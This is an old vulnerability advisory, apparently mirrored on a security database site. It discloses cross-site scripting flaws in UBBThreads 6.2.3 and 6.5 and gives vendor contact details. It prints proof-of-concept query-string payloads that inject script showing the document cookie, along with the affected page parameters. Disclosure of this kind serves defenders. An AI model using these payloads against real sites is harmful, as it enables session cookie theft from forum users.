Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

ubbXSS.txt

๐Ÿ—“๏ธย 30 Dec 2004ย 00:00:00Reported byย Packet StormTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 16ย Views

UBBThreads has vulnerabilities in versions 6.2.3 and 6.5 allowing session cookie theft.

Show more
Code
`Vendor: Infopop  
URL: http://www.infopop.com/  
tested Versions: 6.2.3 & 6.5  
remote: yes  
vendor notified: 06 Dec 2004 at 01:08 AM  
Vendor response: 06/07 Dec 2004 01:33 AM/06:08 PM  
Update status: ..in process  
  
  
============================================================  
  
  
  
Summary:  
~~~~~~~  
UBBThreads is a High end forum system, powered under  
PHP and MySQL with many attitude.  
A security vulnerability in both (6.2.3 & 6.5) products  
allow malicious users to steal session cookies, but  
probably more versions are vulnerable.  
============================================================  
  
  
  
Examples in Version 6.2.3:  
~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
[forum]/showflat.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C/SCRIPT%3E%0D%0A"));  
  
tested modules are:  
main, search, newuser, login, online, faq, ect..  
  
  
Note:  
~~~~  
some of these were fixed in Version 6.5.  
It follows the not fixed..  
============================================================  
  
  
  
Examples in version 6.5:  
~~~~~~~~~~~~~~~~~~~~~~~~  
  
[forum]/calendar.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C/SCRIPT%3E%0D%0A"));  
  
  
[forum]/login.php?Cat=[XSS(s.a.)]  
  
and:  
[forum]/online.php?Cat=[XSS(s.a.)]  
  
  
  
============================================================  
  
  
  
Vendor:  
~~~~~  
Vulnerabilities will be fixed in the next release,  
Version 6.5.1. Since March 2004, Infopop offers no longer  
support for any version of UBB.classic or UBB.threads  
prior to Version 6.0.  
  
http://www.infopop.com/  
http://www.ubbcentral.com/  
  
  
  
============================================================  
  
Credits:  
~~~~~  
dw.; ms.; ect.  
  
  
--   
kind regards  
g@cat <-> MM  
  
  
-----------------------------------------  
This email was sent using FREE Catholic Online Webmail!  
http://webmail.catholic.org/  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
30 Dec 2004 00:00Current
ubbthreads vulnerabilitysession cookie theftversions 6.2.3 6.5vendor notifiedvendor response.
16
.json
Report